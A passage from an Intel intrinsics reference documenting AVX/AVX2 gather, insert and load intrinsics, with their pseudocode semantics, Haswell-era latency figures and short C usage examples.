Gather 64-bit integers from memory using 32-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*64 m := j*32 IF mask[i+63] dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+31:m])*scale] mask[i+63] := 0 ELSE dst[i+63:i] := src[i+63:i] FI ENDFOR mask[MAX:256] := 0 dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherdpd
__m128d _mm_i32gather_pd (double const* base_addr, __m128i vindex, const int scale)

Synopsis

__m128d _mm_i32gather_pd (double const* base_addr, __m128i vindex, const int scale)
#include «immintrin.h»
Instruction: vgatherdpd xmm, vm32x, xmm
CPUID Flags: AVX2

Description

Gather double-precision (64-bit) floating-point elements from memory using 32-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*64 m := j*32 dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+31:m])*scale] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherdpd
__m128d _mm_mask_i32gather_pd (__m128d src, double const* base_addr, __m128i vindex, __m128d mask, const int scale)

Synopsis

__m128d _mm_mask_i32gather_pd (__m128d src, double const* base_addr, __m128i vindex, __m128d mask, const int scale)
#include «immintrin.h»
Instruction: vgatherdpd xmm, vm32x, xmm
CPUID Flags: AVX2

Description

Gather double-precision (64-bit) floating-point elements from memory using 32-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*64 m := j*32 IF mask[i+63] dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+31:m])*scale] mask[i+63] := 0 ELSE dst[i+63:i] := src[i+63:i] FI ENDFOR mask[MAX:128] := 0 dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherdpd
__m256d _mm256_i32gather_pd (double const* base_addr, __m128i vindex, const int scale)

Synopsis

__m256d _mm256_i32gather_pd (double const* base_addr, __m128i vindex, const int scale)
#include «immintrin.h»
Instruction: vgatherdpd ymm, vm32x, ymm
CPUID Flags: AVX2

Description

Gather double-precision (64-bit) floating-point elements from memory using 32-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*64 m := j*32 dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+31:m])*scale] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherdpd
__m256d _mm256_mask_i32gather_pd (__m256d src, double const* base_addr, __m128i vindex, __m256d mask, const int scale)

Synopsis

__m256d _mm256_mask_i32gather_pd (__m256d src, double const* base_addr, __m128i vindex, __m256d mask, const int scale)
#include «immintrin.h»
Instruction: vgatherdpd ymm, vm32x, ymm
CPUID Flags: AVX2

Description

Gather double-precision (64-bit) floating-point elements from memory using 32-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*64 m := j*32 IF mask[i+63] dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+31:m])*scale] mask[i+63] := 0 ELSE dst[i+63:i] := src[i+63:i] FI ENDFOR mask[MAX:256] := 0 dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherdps
__m128 _mm_i32gather_ps (float const* base_addr, __m128i vindex, const int scale)

Synopsis

__m128 _mm_i32gather_ps (float const* base_addr, __m128i vindex, const int scale)
#include «immintrin.h»
Instruction: vgatherdps xmm, vm32x, xmm
CPUID Flags: AVX2

Description

Gather single-precision (32-bit) floating-point elements from memory using 32-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*32 dst[i+31:i] := MEM[base_addr + SignExtend(vindex[i+31:i])*scale] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherdps
__m128 _mm_mask_i32gather_ps (__m128 src, float const* base_addr, __m128i vindex, __m128 mask, const int scale)

Synopsis

__m128 _mm_mask_i32gather_ps (__m128 src, float const* base_addr, __m128i vindex, __m128 mask, const int scale)
#include «immintrin.h»
Instruction: vgatherdps xmm, vm32x, xmm
CPUID Flags: AVX2

Description

Gather single-precision (32-bit) floating-point elements from memory using 32-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*32 IF mask[i+31] dst[i+31:i] := MEM[base_addr + SignExtend(vindex[i+31:i])*scale] mask[i+31] := 0 ELSE dst[i+31:i] := src[i+31:i] FI ENDFOR mask[MAX:128] := 0 dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherdps
__m256 _mm256_i32gather_ps (float const* base_addr, __m256i vindex, const int scale)

Synopsis

__m256 _mm256_i32gather_ps (float const* base_addr, __m256i vindex, const int scale)
#include «immintrin.h»
Instruction: vgatherdps ymm, vm32x, ymm
CPUID Flags: AVX2

Description

Gather single-precision (32-bit) floating-point elements from memory using 32-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := MEM[base_addr + SignExtend(vindex[i+31:i])*scale] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
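
A sketch of the 256-bit float gather, here used to permute an array by an index vector (data and indices are illustrative; assumes AVX2):

#include <immintrin.h>
#include <stdio.h>

int main(void) {
    float src[8] = { 0.f, 1.f, 2.f, 3.f, 4.f, 5.f, 6.f, 7.f };
    __m256i idx  = _mm256_setr_epi32(7, 6, 5, 4, 3, 2, 1, 0);  /* reverse order         */
    __m256  got  = _mm256_i32gather_ps(src, idx, 4);           /* scale = sizeof(float) */

    float out[8];
    _mm256_storeu_ps(out, got);
    for (int k = 0; k < 8; k++) printf("%.0f ", out[k]);       /* 7 6 5 4 3 2 1 0 */
    printf("\n");
    return 0;
}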
vgatherdps
__m256 _mm256_mask_i32gather_ps (__m256 src, float const* base_addr, __m256i vindex, __m256 mask, const int scale)

Synopsis

__m256 _mm256_mask_i32gather_ps (__m256 src, float const* base_addr, __m256i vindex, __m256 mask, const int scale)
#include «immintrin.h»
Instruction: vgatherdps ymm, vm32x, ymm
CPUID Flags: AVX2

Description

Gather single-precision (32-bit) floating-point elements from memory using 32-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 7 i := j*32 IF mask[i+31] dst[i+31:i] := MEM[base_addr + SignExtend(vindex[i+31:i])*scale] mask[i+31] := 0 ELSE dst[i+31:i] := src[i+31:i] FI ENDFOR mask[MAX:256] := 0 dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherqd
__m128i _mm_i64gather_epi32 (int const* base_addr, __m128i vindex, const int scale)

Synopsis

__m128i _mm_i64gather_epi32 (int const* base_addr, __m128i vindex, const int scale)
#include «immintrin.h»
Instruction: vpgatherqd xmm, vm64x, xmm
CPUID Flags: AVX2

Description

Gather 32-bit integers from memory using 64-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*32 m := j*64 dst[i+31:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] ENDFOR dst[MAX:64] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherqd
__m128i _mm_mask_i64gather_epi32 (__m128i src, int const* base_addr, __m128i vindex, __m128i mask, const int scale)

Synopsis

__m128i _mm_mask_i64gather_epi32 (__m128i src, int const* base_addr, __m128i vindex, __m128i mask, const int scale)
#include «immintrin.h»
Instruction: vpgatherqd xmm, vm64x, xmm
CPUID Flags: AVX2

Description

Gather 32-bit integers from memory using 64-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*32 m := j*64 IF mask[i+31] dst[i+31:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] mask[i+31] := 0 ELSE dst[i+31:i] := src[i+31:i] FI ENDFOR mask[MAX:64] := 0 dst[MAX:64] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherqd
__m128i _mm256_i64gather_epi32 (int const* base_addr, __m256i vindex, const int scale)

Synopsis

__m128i _mm256_i64gather_epi32 (int const* base_addr, __m256i vindex, const int scale)
#include «immintrin.h»
Instruction: vpgatherqd ymm, vm64x, ymm
CPUID Flags: AVX2

Description

Gather 32-bit integers from memory using 64-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*32 m := j*64 dst[i+31:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] ENDFOR dst[MAX:128] := 0
vpgatherqd
__m128i _mm256_mask_i64gather_epi32 (__m128i src, int const* base_addr, __m256i vindex, __m128i mask, const int scale)

Synopsis

__m128i _mm256_mask_i64gather_epi32 (__m128i src, int const* base_addr, __m256i vindex, __m128i mask, const int scale)
#include «immintrin.h»
Instruction: vpgatherqd ymm, vm64x, ymm
CPUID Flags: AVX2

Description

Gather 32-bit integers from memory using 64-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*32 m := j*64 IF mask[i+31] dst[i+31:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] mask[i+31] := 0 ELSE dst[i+31:i] := src[i+31:i] FI ENDFOR mask[MAX:128] := 0 dst[MAX:128] := 0
vpgatherqq
__m128i _mm_i64gather_epi64 (__int64 const* base_addr, __m128i vindex, const int scale)

Synopsis

__m128i _mm_i64gather_epi64 (__int64 const* base_addr, __m128i vindex, const int scale)
#include «immintrin.h»
Instruction: vpgatherqq xmm, vm64x, xmm
CPUID Flags: AVX2

Description

Gather 64-bit integers from memory using 64-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*64 dst[i+63:i] := MEM[base_addr + SignExtend(vindex[i+63:i])*scale] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherqq
__m128i _mm_mask_i64gather_epi64 (__m128i src, __int64 const* base_addr, __m128i vindex, __m128i mask, const int scale)

Synopsis

__m128i _mm_mask_i64gather_epi64 (__m128i src, __int64 const* base_addr, __m128i vindex, __m128i mask, const int scale)
#include «immintrin.h»
Instruction: vpgatherqq xmm, vm64x, xmm
CPUID Flags: AVX2

Description

Gather 64-bit integers from memory using 64-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*64 IF mask[i+63] dst[i+63:i] := MEM[base_addr + SignExtend(vindex[i+63:i])*scale] mask[i+63] := 0 ELSE dst[i+63:i] := src[i+63:i] FI ENDFOR mask[MAX:128] := 0 dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherqq
__m256i _mm256_i64gather_epi64 (__int64 const* base_addr, __m256i vindex, const int scale)

Synopsis

__m256i _mm256_i64gather_epi64 (__int64 const* base_addr, __m256i vindex, const int scale)
#include «immintrin.h»
Instruction: vpgatherqq ymm, vm64x, ymm
CPUID Flags: AVX2

Description

Gather 64-bit integers from memory using 64-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := MEM[base_addr + SignExtend(vindex[i+63:i])*scale] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherqq
__m256i _mm256_mask_i64gather_epi64 (__m256i src, __int64 const* base_addr, __m256i vindex, __m256i mask, const int scale)

Synopsis

__m256i _mm256_mask_i64gather_epi64 (__m256i src, __int64 const* base_addr, __m256i vindex, __m256i mask, const int scale)
#include «immintrin.h»
Instruction: vpgatherqq ymm, vm64x, ymm
CPUID Flags: AVX2

Description

Gather 64-bit integers from memory using 64-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*64 IF mask[i+63] dst[i+63:i] := MEM[base_addr + SignExtend(vindex[i+63:i])*scale] mask[i+63] := 0 ELSE dst[i+63:i] := src[i+63:i] FI ENDFOR mask[MAX:256] := 0 dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherqpd
__m128d _mm_i64gather_pd (double const* base_addr, __m128i vindex, const int scale)

Synopsis

__m128d _mm_i64gather_pd (double const* base_addr, __m128i vindex, const int scale)
#include «immintrin.h»
Instruction: vgatherqpd xmm, vm64x, xmm
CPUID Flags: AVX2

Description

Gather double-precision (64-bit) floating-point elements from memory using 64-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*64 dst[i+63:i] := MEM[base_addr + SignExtend(vindex[i+63:i])*scale] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherqpd
__m128d _mm_mask_i64gather_pd (__m128d src, double const* base_addr, __m128i vindex, __m128d mask, const int scale)

Synopsis

__m128d _mm_mask_i64gather_pd (__m128d src, double const* base_addr, __m128i vindex, __m128d mask, const int scale)
#include «immintrin.h»
Instruction: vgatherqpd xmm, vm64x, xmm
CPUID Flags: AVX2

Description

Gather double-precision (64-bit) floating-point elements from memory using 64-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*64 IF mask[i+63] dst[i+63:i] := MEM[base_addr + SignExtend(vindex[i+63:i])*scale] mask[i+63] := 0 ELSE dst[i+63:i] := src[i+63:i] FI ENDFOR mask[MAX:128] := 0 dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherqpd
__m256d _mm256_i64gather_pd (double const* base_addr, __m256i vindex, const int scale)

Synopsis

__m256d _mm256_i64gather_pd (double const* base_addr, __m256i vindex, const int scale)
#include «immintrin.h»
Instruction: vgatherqpd ymm, vm64x, ymm
CPUID Flags: AVX2

Description

Gather double-precision (64-bit) floating-point elements from memory using 64-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := MEM[base_addr + SignExtend(vindex[i+63:i])*scale] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherqpd
__m256d _mm256_mask_i64gather_pd (__m256d src, double const* base_addr, __m256i vindex, __m256d mask, const int scale)

Synopsis

__m256d _mm256_mask_i64gather_pd (__m256d src, double const* base_addr, __m256i vindex, __m256d mask, const int scale)
#include «immintrin.h»
Instruction: vgatherqpd ymm, vm64x, ymm
CPUID Flags: AVX2

Description

Gather double-precision (64-bit) floating-point elements from memory using 64-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*64 IF mask[i+63] dst[i+63:i] := MEM[base_addr + SignExtend(vindex[i+63:i])*scale] mask[i+63] := 0 ELSE dst[i+63:i] := src[i+63:i] FI ENDFOR mask[MAX:256] := 0 dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherqps
__m128 _mm_i64gather_ps (float const* base_addr, __m128i vindex, const int scale)

Synopsis

__m128 _mm_i64gather_ps (float const* base_addr, __m128i vindex, const int scale)
#include «immintrin.h»
Instruction: vgatherqps xmm, vm64x, xmm
CPUID Flags: AVX2

Description

Gather single-precision (32-bit) floating-point elements from memory using 64-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*32 m := j*64 dst[i+31:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] ENDFOR dst[MAX:64] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherqps
__m128 _mm_mask_i64gather_ps (__m128 src, float const* base_addr, __m128i vindex, __m128 mask, const int scale)

Synopsis

__m128 _mm_mask_i64gather_ps (__m128 src, float const* base_addr, __m128i vindex, __m128 mask, const int scale)
#include «immintrin.h»
Instruction: vgatherqps xmm, vm64x, xmm
CPUID Flags: AVX2

Description

Gather single-precision (32-bit) floating-point elements from memory using 64-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*32 m := j*64 IF mask[i+31] dst[i+31:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] mask[i+31] := 0 ELSE dst[i+31:i] := src[i+31:i] FI ENDFOR mask[MAX:64] := 0 dst[MAX:64] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherqps
__m128 _mm256_i64gather_ps (float const* base_addr, __m256i vindex, const int scale)

Synopsis

__m128 _mm256_i64gather_ps (float const* base_addr, __m256i vindex, const int scale)
#include «immintrin.h»
Instruction: vgatherqps ymm, vm64x, ymm
CPUID Flags: AVX2

Description

Gather single-precision (32-bit) floating-point elements from memory using 64-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*32 m := j*64 dst[i+31:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherqps
__m128 _mm256_mask_i64gather_ps (__m128 src, float const* base_addr, __m256i vindex, __m128 mask, const int scale)

Synopsis

__m128 _mm256_mask_i64gather_ps (__m128 src, float const* base_addr, __m256i vindex, __m128 mask, const int scale)
#include «immintrin.h»
Instruction: vgatherqps ymm, vm64x, ymm
CPUID Flags: AVX2

Description

Gather single-precision (32-bit) floating-point elements from memory using 64-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*32 m := j*64 IF mask[i+31] dst[i+31:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] mask[i+31] := 0 ELSE dst[i+31:i] := src[i+31:i] FI ENDFOR mask[MAX:128] := 0 dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
__m256i _mm256_insert_epi16 (__m256i a, __int16 i, const int index)

Synopsis

__m256i _mm256_insert_epi16 (__m256i a, __int16 i, const int index)
#include «immintrin.h»
CPUID Flags: AVX

Description

Copy a to dst, and insert the 16-bit integer i into dst at the location specified by index.

Operation

dst[255:0] := a[255:0] sel := index*16 dst[sel+15:sel] := i[15:0]
__m256i _mm256_insert_epi32 (__m256i a, __int32 i, const int index)

Synopsis

__m256i _mm256_insert_epi32 (__m256i a, __int32 i, const int index)
#include «immintrin.h»
CPUID Flags: AVX

Description

Copy a to dst, and insert the 32-bit integer i into dst at the location specified by index.

Operation

dst[255:0] := a[255:0] sel := index*32 dst[sel+31:sel] := i[31:0]
__m256i _mm256_insert_epi64 (__m256i a, __int64 i, const int index)

Synopsis

__m256i _mm256_insert_epi64 (__m256i a, __int64 i, const int index)
#include «immintrin.h»
CPUID Flags: AVX

Description

Copy a to dst, and insert the 64-bit integer i into dst at the location specified by index.

Operation

dst[255:0] := a[255:0] sel := index*64 dst[sel+63:sel] := i[63:0]
__m256i _mm256_insert_epi8 (__m256i a, __int8 i, const int index)

Synopsis

__m256i _mm256_insert_epi8 (__m256i a, __int8 i, const int index)
#include «immintrin.h»
CPUID Flags: AVX

Description

Copy a to dst, and insert the 8-bit integer i into dst at the location specified by index.

Operation

dst[255:0] := a[255:0] sel := index*8 dst[sel+7:sel] := i[7:0]
vinsertf128
__m256d _mm256_insertf128_pd (__m256d a, __m128d b, int imm8)

Synopsis

__m256d _mm256_insertf128_pd (__m256d a, __m128d b, int imm8)
#include «immintrin.h»
Instruction: vinsertf128 ymm, ymm, xmm, imm
CPUID Flags: AVX

Description

Copy a to dst, then insert 128 bits (composed of 2 packed double-precision (64-bit) floating-point elements) from b into dst at the location specified by imm8.

Operation

dst[255:0] := a[255:0] CASE (imm8[1:0]) of 0: dst[127:0] := b[127:0] 1: dst[255:128] := b[127:0] ESAC dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vinsertf128
__m256 _mm256_insertf128_ps (__m256 a, __m128 b, int imm8)

Synopsis

__m256 _mm256_insertf128_ps (__m256 a, __m128 b, int imm8)
#include «immintrin.h»
Instruction: vinsertf128 ymm, ymm, xmm, imm
CPUID Flags: AVX

Description

Copy a to dst, then insert 128 bits (composed of 4 packed single-precision (32-bit) floating-point elements) from b into dst at the location specified by imm8.

Operation

dst[255:0] := a[255:0] CASE (imm8[1:0]) of 0: dst[127:0] := b[127:0] 1: dst[255:128] := b[127:0] ESAC dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vinsertf128
__m256i _mm256_insertf128_si256 (__m256i a, __m128i b, int imm8)

Synopsis

__m256i _mm256_insertf128_si256 (__m256i a, __m128i b, int imm8)
#include «immintrin.h»
Instruction: vinsertf128 ymm, ymm, xmm, imm
CPUID Flags: AVX

Description

Copy a to dst, then insert 128 bits from b into dst at the location specified by imm8.

Operation

dst[255:0] := a[255:0] CASE (imm8[1:0]) of 0: dst[127:0] := b[127:0] 1: dst[255:128] := b[127:0] ESAC dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vinserti128
__m256i _mm256_inserti128_si256 (__m256i a, __m128i b, const int imm8)

Synopsis

__m256i _mm256_inserti128_si256 (__m256i a, __m128i b, const int imm8)
#include «immintrin.h»
Instruction: vinserti128 ymm, ymm, xmm, imm
CPUID Flags: AVX2

Description

Copy a to dst, then insert 128 bits (composed of integer data) from b into dst at the location specified by imm8.

Operation

dst[255:0] := a[255:0] CASE (imm8[1:0]) of 0: dst[127:0] := b[127:0] 1: dst[255:128] := b[127:0] ESAC dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
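
A typical use of vinserti128 is assembling a __m256i from two independent __m128i halves: cast the first half into the low lane, then insert the second half into the upper lane. A minimal sketch (assumes AVX2):

#include <immintrin.h>
#include <stdio.h>

int main(void) {
    __m128i lo = _mm_setr_epi32(1, 2, 3, 4);
    __m128i hi = _mm_setr_epi32(5, 6, 7, 8);

    __m256i v = _mm256_castsi128_si256(lo);   /* low 128 bits = lo (upper bits undefined) */
    v = _mm256_inserti128_si256(v, hi, 1);    /* imm8 = 1: write the upper 128 bits       */

    int out[8];
    _mm256_storeu_si256((__m256i *)out, v);
    for (int k = 0; k < 8; k++) printf("%d ", out[k]);  /* 1 2 3 4 5 6 7 8 */
    printf("\n");
    return 0;
}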
vlddqu
__m256i _mm256_lddqu_si256 (__m256i const * mem_addr)

Synopsis

__m256i _mm256_lddqu_si256 (__m256i const * mem_addr)
#include «immintrin.h»
Instruction: vlddqu ymm, m256
CPUID Flags: AVX

Description

Load 256-bits of integer data from unaligned memory into dst. This intrinsic may perform better than _mm256_loadu_si256 when the data crosses a cache line boundary.

Operation

dst[255:0] := MEM[mem_addr+255:mem_addr] dst[MAX:256] := 0
vmovapd
__m256d _mm256_load_pd (double const * mem_addr)

Synopsis

__m256d _mm256_load_pd (double const * mem_addr)
#include «immintrin.h»
Instruction: vmovapd ymm, m256
CPUID Flags: AVX

Description

Load 256-bits (composed of 4 packed double-precision (64-bit) floating-point elements) from memory into dst. mem_addr must be aligned on a 32-byte boundary or a general-protection exception may be generated.

Operation

dst[255:0] := MEM[mem_addr+255:mem_addr] dst[MAX:256] := 0
vmovaps
__m256 _mm256_load_ps (float const * mem_addr)

Synopsis

__m256 _mm256_load_ps (float const * mem_addr)
#include «immintrin.h»
Instruction: vmovaps ymm, m256
CPUID Flags: AVX

Description

Load 256-bits (composed of 8 packed single-precision (32-bit) floating-point elements) from memory into dst. mem_addr must be aligned on a 32-byte boundary or a general-protection exception may be generated.

Operation

dst[255:0] := MEM[mem_addr+255:mem_addr] dst[MAX:256] := 0
vmovdqa
__m256i _mm256_load_si256 (__m256i const * mem_addr)

Synopsis

__m256i _mm256_load_si256 (__m256i const * mem_addr)
#include «immintrin.h»
Instruction: vmovdqa ymm, m256
CPUID Flags: AVX

Description

Load 256-bits of integer data from memory into dst. mem_addr must be aligned on a 32-byte boundary or a general-protection exception may be generated.

Operation

dst[255:0] := MEM[mem_addr+255:mem_addr] dst[MAX:256] := 0
vmovupd
__m256d _mm256_loadu_pd (double const * mem_addr)

Synopsis

__m256d _mm256_loadu_pd (double const * mem_addr)
#include «immintrin.h»
Instruction: vmovupd ymm, m256
CPUID Flags: AVX

Description

Load 256-bits (composed of 4 packed double-precision (64-bit) floating-point elements) from memory into dst. mem_addr does not need to be aligned on any particular boundary.

Operation

dst[255:0] := MEM[mem_addr+255:mem_addr] dst[MAX:256] := 0
vmovups
__m256 _mm256_loadu_ps (float const * mem_addr)

Synopsis

__m256 _mm256_loadu_ps (float const * mem_addr)
#include «immintrin.h»
Instruction: vmovups ymm, m256
CPUID Flags: AVX

Description

Load 256-bits (composed of 8 packed single-precision (32-bit) floating-point elements) from memory into dst. mem_addr does not need to be aligned on any particular boundary.

Operation

dst[255:0] := MEM[mem_addr+255:mem_addr] dst[MAX:256] := 0
vmovdqu
__m256i _mm256_loadu_si256 (__m256i const * mem_addr)

Synopsis

__m256i _mm256_loadu_si256 (__m256i const * mem_addr)
#include «immintrin.h»
Instruction: vmovdqu ymm, m256
CPUID Flags: AVX

Description

Load 256-bits of integer data from memory into dst. mem_addr does not need to be aligned on any particular boundary.

Operation

dst[255:0] := MEM[mem_addr+255:mem_addr] dst[MAX:256] := 0
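
The aligned and unaligned loads differ only in their alignment requirement. A short sketch (assumes AVX and a GCC/Clang-style alignment attribute; C11 _Alignas would work as well):

#include <immintrin.h>
#include <stdio.h>

int main(void) {
    __attribute__((aligned(32))) int data[8] = { 1, 2, 3, 4, 5, 6, 7, 8 };

    __m256i a = _mm256_load_si256((const __m256i *)data);   /* requires 32-byte alignment */
    __m256i u = _mm256_loadu_si256((const __m256i *)data);  /* works for any address      */

    __m256i sum = _mm256_add_epi32(a, u);
    int out[8];
    _mm256_storeu_si256((__m256i *)out, sum);
    printf("%d ... %d\n", out[0], out[7]);                   /* 2 ... 16 */
    return 0;
}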
__m256 _mm256_loadu2_m128 (float const* hiaddr, float const* loaddr)

Synopsis

__m256 _mm256_loadu2_m128 (float const* hiaddr, float const* loaddr)
#include «immintrin.h»
CPUID Flags: AVX

Description

Load two 128-bit values (composed of 4 packed single-precision (32-bit) floating-point elements) from memory, and combine them into a 256-bit value in dst. hiaddr and loaddr do not need to be aligned on any particular boundary.

Operation

dst[127:0] := MEM[loaddr+127:loaddr] dst[255:128] := MEM[hiaddr+127:hiaddr] dst[MAX:256] := 0
